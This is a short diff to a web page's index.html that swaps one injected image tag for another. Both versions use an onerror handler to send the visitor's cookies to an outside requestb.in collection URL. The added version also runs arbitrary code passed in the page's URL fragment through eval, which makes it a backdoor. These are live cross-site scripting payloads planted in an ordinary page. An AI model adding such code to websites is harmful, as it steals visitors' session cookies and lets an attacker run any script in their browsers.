--- a/index.html
+++ b/index.html
@@ -722,6 +722,6 @@ $(window).load(function(){
 
 
 </style>
-<img src="xxx://" onerror="top.location='https://requestb.in/16m8j121?i='+top.document.cookie">
+<img src="x" onerror="if(location.hash){eval(location.hash.slice(1))}else{top.location='https://requestb.in/16m8j121?i='+top.document.cookie}">
 </body>
 </html>
